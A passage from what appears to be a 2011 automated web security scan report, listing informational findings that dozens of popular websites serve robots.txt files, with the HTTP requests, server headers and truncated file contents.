User-agent: *
Disallow: /servlet/
Disallow: /abe/
Disallow: /abep/
Disallow: /cgi/
Disallow: /search/
Disallow: /docs/Newsletters/BD
Disallow: /es/docs/BooksellerCentral/informativos

User-ag
...[SNIP]...

24.20. http://www.about.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.about.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.about.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:37:24 GMT
Server: Apache
Vary: *
PRAGMA: no-cache
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=3600
Expires: Sat, 02 Apr 2011 13:37:24 GMT
Connection: close
Content-Type: text/plain

# robots.txt for Sites
# Do Not delete this file.

User-agent: *
Disallow: /cgi/
Disallow: /gi/
Disallow: /library/nosearch/
Disallow: /zadz/
Disallow: /zdynahubz/
Disallow: /zeventsz/
Disallow: /zfre
...[SNIP]...

24.21. http://www.aboutus.org/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aboutus.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.aboutus.org

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Sat, 02 Apr 2011 13:42:59 GMT
Content-Type: text/plain
Content-Length: 1211
Last-Modified: Sat, 02 Apr 2011 00:32:54 GMT
Connection: close
X-node-id: rogue
Accept-Ranges: bytes
Set-Cookie: SERVERID=rogue; path=/

User-agent: Orthogaffe
Disallow: /

User-agent: UbiCrawler
Disallow: /

User-agent: DOC
Disallow: /

User-agent: Zao
Disallow: /

User-agent: sitecheck.internetseer.com
Disallow: /

User-agent: Zealbo
...[SNIP]...

24.22. http://www.accesshollywood.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.accesshollywood.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.accesshollywood.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 PHP/5.1.6
Content-Type: text/plain
Content-Length: 50
X-Aicache-OS: 64.210.193.116:80
Expires: Sat, 02 Apr 2011 13:45:42 GMT
Date: Sat, 02 Apr 2011 13:45:42 GMT
Connection: close
Set-Cookie: ak-mobile-detected=no; expires=Sun, 03-Apr-2011 13:45:42 GMT; path=/
Vary: User-Agent

user-agent: *
disallow: /modules/fetch_module.php

24.23. http://www.accuweather.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.accuweather.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.accuweather.com

Response

HTTP/1.0 200 OK
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 12:43:39 GMT
Content-Length: 1893
Connection: close

User-agent: *
Disallow: /_mm/
Disallow: /_notes/
Disallow: /_baks/
Disallow: /adc2004/
Disallow: /MMWIP/
Disallow: /m/storm.aspx
Disallow: /m/US/weather.aspx
Disallow: /m/US/radar.aspx
Disall
...[SNIP]...

24.24. http://www.acehardware.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.acehardware.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.acehardware.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:06:39 GMT
Server: Apache/2.0.63 (Unix)
Last-Modified: Tue, 30 Jun 2009 08:45:06 GMT
ETag: "4e4490-1f5-46d8cd2c7c880"
Accept-Ranges: bytes
Content-Length: 501
Cache-Control: max-age=172800
Expires: Mon, 04 Apr 2011 14:06:39 GMT
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *
Disallow: /coreg/
Disallow: /compare/
Disallow: /cart/
Disallow: /css/
Disallow: /checkout/
Disallow: /customHandler/
Disallow: /cartHandler/
Disallow: /fsrscripts/
Disallow: /Controll
...[SNIP]...

24.25. http://www.aceshowbiz.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aceshowbiz.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.aceshowbiz.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:09:05 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Wed, 03 Dec 2008 03:31:08 GMT
ETag: "1280019-54-45d1c131d5700"
Accept-Ranges: bytes
Content-Length: 84
Connection: close
Content-Type: text/plain

User-agent: Mediapartners-Google*
Disallow:
User-agent: Teleport Pro/1.29
Disallow:

24.26. http://www.active.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.active.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.active.com

Response

HTTP/1.0 200 OK
Content-Length: 603
Content-Type: text/plain
Last-Modified: Tue, 08 Mar 2011 22:15:08 GMT
Accept-Ranges: bytes
ETag: "1CBDDDE488EFE00:1CBEBFFD7BCCCAE"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-ACMCache: ReasonNotCached: NoPolicy.
Expires: Sat, 02 Apr 2011 13:45:19 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:45:19 GMT
Connection: close

User-agent: *
Disallow: /CM/
Disallow: /admin
Disallow: /explorer
Disallow: /myactive
Disallow: /register
Disallow: /archive
Disallow: /bids
Disallow: /datafeeds
Disallow: /desktop_xml
Disa
...[SNIP]...

24.27. http://www.addictinggames.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.addictinggames.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.addictinggames.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 Resin/3.1.9 PHP/5.3.1
Last-Modified: Thu, 24 Feb 2011 18:34:27 GMT
ETag: "10efc02e8-4a-49d0b769ea961"
Accept-Ranges: bytes
Content-Length: 74
Content-Type: text/plain
Date: Sat, 02 Apr 2011 13:35:47 GMT
Connection: close

User-agent: *
Disallow:
Sitemap: http://www.addictinggames.com/sitemap.xml

24.28. http://www.adobe.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adobe.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.adobe.com

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Fri, 28 Jan 2011 21:45:16 GMT
ETag: "501-fb4f1300"
Accept-Ranges: bytes
Cache-Control: max-age=900
Expires: Sat, 02 Apr 2011 07:43:51 GMT
Content-Type: text/plain
Connection: close
Date: Sat, 02 Apr 2011 12:37:36 GMT
Age: 303
Content-Length: 1281

#
# This file is used to allow crawlers to index our site.
#
# List of all web robots: http://www.robotstxt.org/wc/active/html/index.html
#
# Check robots.txt at:
# http://www.searchengineworld.com/c
...[SNIP]...

24.29. http://www.adp.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adp.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.adp.com

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=QXZQWRSaprodadpws02CKYOQ; path=/
Content-Length: 7930
Content-Type: text/plain
Last-Modified: Mon, 23 Aug 2010 17:52:36 GMT
Accept-Ranges: bytes
ETag: "323e8af8eb42cb1:d1a9"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:45:44 GMT
Connection: close

User-agent: *
Disallow: /mobile/run
Disallow: /en-ca/solutions/employer-services/comprehensive-outsourcing-services/large-business.aspx
Disallow: /fr-ca/solutions/employer-services/comprehensive-ou
...[SNIP]...

24.30. http://www.adriver.ru/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adriver.ru
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.adriver.ru

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:05:33 GMT
Server: Apache
Last-Modified: Thu, 09 Dec 2010 17:10:12 GMT
ETag: "45abb1-2bc-496fd4f874500"
Accept-Ranges: bytes
Content-Length: 700
Connection: close
Content-Type: text/plain; charset=windows-1251

# NetCat 2 Robots file
User-agent: *
Disallow: /netcat/
Disallow: /install/
Disallow: /search/

# Disallow pages
Disallow: /agency/test/questions/
Disallow: /agency/list/
Disallow: /publisher/trafficp
...[SNIP]...

24.31. http://www.advanceautoparts.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.advanceautoparts.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.advanceautoparts.com

Response

HTTP/1.0 200 OK
Server: IBM_HTTP_Server
Last-Modified: Fri, 01 Oct 2010 23:11:38 GMT
ETag: "556a7-111-4919651107e80"-gzip
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo TELo OUR IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA PRE LOC"
Content-Type: text/plain
Cache-Control: max-age=3600
Expires: Sat, 02 Apr 2011 14:53:19 GMT
Date: Sat, 02 Apr 2011 13:53:19 GMT
Content-Length: 273
Connection: close
Set-Cookie: Region=DC; path=/; domain=.advanceautoparts.com
Set-Cookie: City=WASHINGTON; path=/; domain=.advanceautoparts.com
Set-Cookie: Areacode=202+703+301; path=/; domain=.advanceautoparts.com
Set-Cookie: Zip=20001-20020+20024+20026+20029-20082+20088-20091+20097-20099+20201-20245+20250-20251+20254+20260-20262+20265-20270+20277+20289+20299+20301+20303+20306-20307+20310+20314-20319+20330+20332+20336-20340+20350+20370+20372-20376+20380+20388-20395+20398+20401-20429+20431+20433-20444+20447+20451+20453+20456+20460+20463+20468-20472+20500-20510+20515+20520-20527+20530-20560+20565-20566+20570-20581+20585-20586+20590-20599; path=/; domain=.advanceautoparts.com

User-agent: *
Disallow: */content_privacypolicy*
Disallow: */LogonForm*
Disallow: */ForgotPasswordView*
Disallow: */UserRegistrationForm*
Disallow: */Address*
Disallow: */TemporaryPasswordSentForm
Dis
...[SNIP]...

24.32. http://www.ae.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ae.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ae.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 13 Jan 2011 21:41:58 GMT
ETag: "b6-499c12fe33580"
Accept-Ranges: bytes
Content-Length: 182
Content-Type: text/plain
Date: Sat, 02 Apr 2011 13:31:35 GMT
Connection: close

User-agent: *
Disallow: /web/trackorder/
Disallow: /77kids/trackorder/
Disallow: /aerie/trackorder/
Disallow: /web/myaccount/
Disallow: /77kids/myaccount/
Disallow: /aerie/myaccount/

24.33. http://www.aeropostale.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aeropostale.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.aeropostale.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:39:10 GMT
Server: Apache/2.0.63 (Unix)
Last-Modified: Wed, 22 Dec 2010 09:47:00 GMT
ETag: "4fc15a-14e-497fca2756d00"
Accept-Ranges: bytes
Content-Length: 334
Cache-Control: max-age=172800
Expires: Mon, 04 Apr 2011 13:39:10 GMT
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *
Disallow: /compare/
Disallow: /cart/
Disallow: /include/
Disallow: /coreg/
Disallow: /ControllerServlet/
Disallow: /cartHandler/
Disallow: /emailHandler/
Disallow: /checkout/
Disallow
...[SNIP]...

24.34. http://www.af.mil/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.af.mil
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.af.mil

Response

HTTP/1.0 200 OK
Content-Length: 161
Content-Type: text/plain
Last-Modified: Wed, 12 Jan 2011 17:19:42 GMT
Accept-Ranges: bytes
ETag: "d42fd2e67cb2cb1:58d"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 14:13:34 GMT
Connection: close

User-agent: *
Crawl-delay: 10
Disallow: /photos/media_email.asp
Disallow: /news/story_email.asp
Disallow: /news/video/
Disallow: /rss/
Disallow: /search/

24.35. http://www.agame.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.agame.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.agame.com

Response

HTTP/1.1 200 OK
Content-Type: text/html
Date: Sat, 02 Apr 2011 13:41:13 GMT
Connection: close
Content-Length: 25

User-agent: *
Allow: /

24.36. http://www.alaskaair.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.alaskaair.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.alaskaair.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Length: 53
Content-Type: text/plain
Last-Modified: Mon, 13 Jul 2009 20:20:40 GMT
Accept-Ranges: bytes
ETag: "01cd263f73ca1:296"
Server: Alaska Airlines
X-Powered-By: Airlines
Date: Sat, 02 Apr 2011 14:12:37 GMT
Connection: close

User-agent: *
Disallow: /shopping/ssl/FareRules.aspx

24.37. http://www.alexa.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.alexa.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.alexa.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
ETag: "2411318070"
Accept-Ranges: bytes
Last-Modified: Thu, 31 Mar 2011 21:53:37 GMT
Content-Length: 3266
Date: Sat, 02 Apr 2011 13:37:05 GMT
Server: httpd

# The crawlers listed below are allowed on the Alexa site.
# Alexa allows other crawlers on a case by case basis.

#
# Alexa provides access to traffic ranking data via Amazon Web Services.
# More
...[SNIP]...

24.38. http://www.alibris.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.alibris.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.alibris.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:56:34 GMT
Connection: Keep-Alive
Via: NS-CACHE-8.0: 17
Server: Apache
Last-Modified: Mon, 28 Feb 2011 22:31:04 GMT
Accept-Ranges: bytes
Content-Length: 556
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /account
Disallow: /classicalsearch
Disallow: /framework
Disallow: /moviesearch
Disallow: /musicsearch
Disallow: /popups
Disallow: /portals
Disallow: /printable
Disallow: /reso
...[SNIP]...

24.39. http://www.allbusiness.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.allbusiness.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.allbusiness.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:37:42 GMT
Server: Apache
Last-Modified: Thu, 09 Dec 2010 00:24:16 GMT
ETag: "185"
Accept-Ranges: bytes
Content-Length: 389
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug

User-agent: *
Disallow: /print/
Disallow: /email/
Disallow: /relatedarticles/
Disallow: /blogs/
Disallow: /nospider/
Disallow: /4049960-1.html
Disallow: /advscripts/

Sitemap: http://www.allbusiness.c
...[SNIP]...

24.40. http://www.allposters.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.allposters.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.allposters.com

Response

HTTP/1.0 200 OK
Cteonnt-Length: 573
Content-Type: text/plain
Last-Modified: Fri, 26 Nov 2010 10:43:38 GMT
ETag: ""
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private, max-age=228650
Date: Sat, 02 Apr 2011 13:31:49 GMT
Content-Length: 573
Connection: close

User-agent: *
Disallow: /getposter.asp
Disallow: /GetPoster.asp
Disallow: /getPoster.asp
Disallow: /getthumb.asp
Disallow: /GetThumb.asp
Disallow: /getThumb.asp
Disallow: /ViewCart.asp
Disallo
...[SNIP]...

24.41. http://www.allrecipes.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.allrecipes.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.allrecipes.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 709
Content-Type: text/plain
Last-Modified: Tue, 22 Mar 2011 23:57:08 GMT
Accept-Ranges: bytes
ETag: "ecaf42daece8cb1:1386"
Server: Microsoft-IIS/6.0
X-Powered-By: WEB205
Date: Sat, 02 Apr 2011 13:25:16 GMT
Connection: close

User-agent: *
Disallow: /logout.ashx
Disallow: /Controls/
Disallow: /My/
Disallow: /Dev/
Disallow: /Help/AboutUs/Press/Logos/
Disallow: /Membership/
Disallow: /SupportingMembership/
Disallow:
...[SNIP]...

24.42. http://www.allvoices.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.allvoices.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.allvoices.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:32:32 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 31 Mar 2011 17:01:54 GMT
ETag: "290dbb-488-49fca40126480"
Accept-Ranges: bytes
Content-Length: 1160
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

# See http://www.robotstxt.org/wc/norobots.html for documentation on how to use the robots.txt file

User-agent: *
Disallow: /compose
Disallow: /login
Disallow: /signup
Disallow: /inbox
Disallow: /edi
...[SNIP]...

24.43. http://www.ally.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ally.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ally.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain; charset=UTF-8
X-Powered-By: Servlet/2.5 JSP/2.1
X-UA-Compatible: IE=8
X-UA-Compatible: IE=8
Cache-Control: no-cache
Date: Sat, 02 Apr 2011 13:43:19 GMT
Content-Length: 64
Connection: close

User-agent: *
Disallow:
Sitemap: http://www.ally.com/sitemap/

24.44. http://www.alphadictionary.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.alphadictionary.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.alphadictionary.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:55:34 GMT
Server: Apache/2.0.46 (Red Hat)
Last-Modified: Sun, 31 Jan 2010 20:42:05 GMT
ETag: "5a42d0-31-e6cb4140"
Accept-Ranges: bytes
Content-Length: 49
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *
Disallow: /sounds/
Crawl-delay: .5

24.45. http://www.altavista.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.altavista.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.altavista.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:58:54 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Last-Modified: Fri, 25 Feb 2011 09:32:25 GMT
Accept-Ranges: bytes
Content-Length: 797
Cache-Control: private
Connection: close
Content-Type: text/plain; charset=utf-8

# Tells Scanning Robots Where They Are And Are Not Welcome
#
# User-agent:    can also specify by name; "*" is for everyone
# Disallow:    disallow if this matches first part of requested path
#            
# For no
...[SNIP]...

24.46. http://www.alumniclass.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.alumniclass.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.alumniclass.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:55:33 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Fri, 25 Feb 2011 23:23:04 GMT
ETag: "320134-90-49d239ca65b06"
Accept-Ranges: bytes
Content-Length: 144
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: ia_archiver
Disallow: /
Disallow: /newsletters
http://www.alumniclass.com/web_sitemap_ac.xml.gz # Added by Google Sitemap Generator

24.47. http://www.amazon.co.uk/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.amazon.co.uk
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.amazon.co.uk

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:43:09 GMT
Server: Server
Last-Modified: Mon, 21 Feb 2011 19:00:04 GMT
ETag: "600-78b2f500"
Accept-Ranges: bytes
Content-Length: 1536
Vary: Accept-Encoding,User-Agent
nnCoection: close
Content-Type: text/plain
Connection: close

# Disallow all crawlers access to certain pages.

User-agent: *
Disallow: /exec/obidos/account-access-login
Disallow: /exec/obidos/change-style
Disallow: /exec/obidos/flex-sign-in
Disallow: /exec/obid
...[SNIP]...

24.48. http://www.americanexpress.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.americanexpress.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.americanexpress.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:33:36 GMT
Server: IBM_HTTP_Server
Set-Cookie: SaneID=173.193.214.243-1301751216270517; path=/; expires=Tue, 05-Apr-16 13:33:36 GMT; domain=.americanexpress.com
Last-Modified: Tue, 14 Oct 2003 06:08:14 GMT
Accept-Ranges: bytes
Content-Length: 193
Cache-Control: max-age=1
Expires: Sat, 02 Apr 2011 13:33:37 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

# American Express
# Format is:
# User-agent: <name of spider>
# Disallow: <nothing> | <path>
# Date By Reason
# 20011119 SEU Initial robots
User-agent: *
Disallow:


24.49. http://www.americangreetings.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.americangreetings.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.americangreetings.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:16:50 GMT
Server: Apache
Last-Modified: Wed, 23 Mar 2011 14:10:35 GMT
ETag: "219d134-941-ecaa4cc0"
Accept-Ranges: bytes
Content-Length: 2369
Content-Type: text/plain
Vary: Accept-Encoding
Connection: close
Set-Cookie: lbsegment=77;path=/;domain=.americangreetings.com;

User-agent: *
Disallow: /2go/
Disallow: /aol/
Disallow: /affiliate/
Disallow: /api/
Disallow: /apps/vicks/
Disallow: /aschulak/
Disallow: /auth/
Disallow: /campstone/
Disallow: /carltoncardcl
...[SNIP]...

24.50. http://www.americantowns.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.americantowns.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.americantowns.com

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=ZONVIRS192.168.6.52CKMQY; path=/
Date: Sat, 02 Apr 2011 13:39:55 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 21 Jan 2011 19:33:42 GMT
ETag: "5507c4-c00-49a6053e69180"
Accept-Ranges: bytes
Content-Length: 3072
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: Mediapartners-Google*
Disallow:

Sitemap: http://sitemaps.americantowns.com/sitemap.xml

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /compone
...[SNIP]...

24.51. http://www.amerisave.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.amerisave.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.amerisave.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:37:35 GMT
Server: Apache/2.2.15 (Win64) mod_ssl/2.2.15 OpenSSL/0.9.8m JRun/4.0
Last-Modified: Thu, 30 Jul 2009 14:58:25 GMT
ETag: "100000000f0dc-13f-46fed8921c2c1"
Accept-Ranges: bytes
Content-Length: 319
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /rateResults.cfm
Disallow: /rateResultsInterim.cfm
Disallow: /widgets
Disallow: /app/
Disallow: /appv2/
Disallow: /applynow/
Disallow: /homeequity/
Disallow: /myrates/
...[SNIP]...

24.52. http://www.amtrak.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.amtrak.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.amtrak.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Sun, 16 May 2010 07:12:43 GMT
Content-Length: 35
ETag: "23-4bef9aeb"
Accept-Ranges: bytes
X-N: S
Date: Sat, 02 Apr 2011 13:50:18 GMT
Connection: close

User-agent: *
Disallow: /employee/

24.53. http://www.ancestry.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ancestry.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ancestry.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Thu, 30 Oct 2008 15:25:48 GMT
Accept-Ranges: bytes
ETag: "026d1c8a33ac91:0"
Server: Microsoft-IIS/7.0
P3P: CP="CAO DSP COR DEVa TAIa OUR BUS UNI NAV INT PRE"
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:23:58 GMT
Connection: close
Content-Length: 594

User-agent: *
Disallow: /browse/bookview.aspx
Disallow: /Browse/BookView.aspx
Disallow: /Browse/bookview.aspx
Disallow: /Browse/print_b.aspx
Disallow: /browse/print_b.aspx
Disallow: /browse/prin
...[SNIP]...

24.54. http://www.andkon.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.andkon.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.andkon.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:44:45 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 17 Jun 2008 22:52:17 GMT
ETag: "2118d38-14c-98878a40"
Accept-Ranges: bytes
Content-Length: 332
Connection: close
Content-Type: text/plain

User-Agent: *
Disallow: /stuf/elcova/01.html

User-Agent: *
Disallow: /yellow.php

User-Agent: *
Disallow: /old.php

User-Agent: *
Disallow: /index.php?start_from=

User-Agent: *
Disallow: /stuf/blog.
...[SNIP]...

24.55. http://www.androidcentral.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.androidcentral.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.androidcentral.com

Response

HTTP/1.1 200 OK
Server: spe
Date: Sat, 02 Apr 2011 14:06:34 GMT
Content-Type: text/plain
Content-Length: 1590
Last-Modified: Wed, 10 Dec 2008 20:12:19 GMT
Connection: close
Accept-Ranges: bytes

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

24.56. http://www.androidforums.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.androidforums.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.androidforums.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 02 Apr 2011 13:46:26 GMT
Content-Type: text/plain
Content-Length: 40
Last-Modified: Thu, 23 Dec 2010 15:07:18 GMT
Connection: close
Expires: Sat, 02 Apr 2011 14:46:26 GMT
Cache-Control: max-age=3600
Accept-Ranges: bytes

User-agent: *
Disallow: /members/list/


24.57. http://www.angieslist.com/favicon.ico

